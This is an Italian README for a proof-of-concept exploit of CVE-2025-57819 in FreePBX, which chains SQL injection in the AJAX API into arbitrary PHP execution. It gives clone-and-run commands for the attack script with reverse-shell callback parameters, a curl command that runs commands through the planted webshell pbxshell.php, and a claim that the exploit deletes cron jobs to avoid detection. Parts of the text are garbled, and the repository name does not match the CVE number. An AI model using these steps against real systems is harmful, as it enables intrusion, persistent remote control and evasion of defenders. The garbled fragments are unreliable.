
Exploit proof-of-concept per CVE-2025-57819 in FreePBX: SQL injection nell'API AJAX per eseguire codice PHP arbitrario, creare una webshell persistente e innescare una reverse shell.
Questo script sfrutta una vulnerabilità nelle versioni di FreePBX precedenti alla 16.0.26.0 (CVE-2025-57819), consentendo a un attaccante remoto di eseguire codice PHP arbitrario tramite una falla di SQL injection nell'endpoint API AJAX. L'exploit crea sia una webshell sia una reverse shell attivata automaticamente.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: Istanza FreePBX di destinazione (es. https://freepbx.example.com)-lhost LHOST: Il tuo IP per il callback della reverse shell-lport LPORT: Porta per la connessione della reverse shellpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
Dopo lo sfruttamento riuscito, accedi alla webshell tramite:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
L'exploit rimuove automaticamente i cron job dopo l'esecuzione per evitare il rilevamento.
-- per commentare la restante sintassi SQL/var/www/html/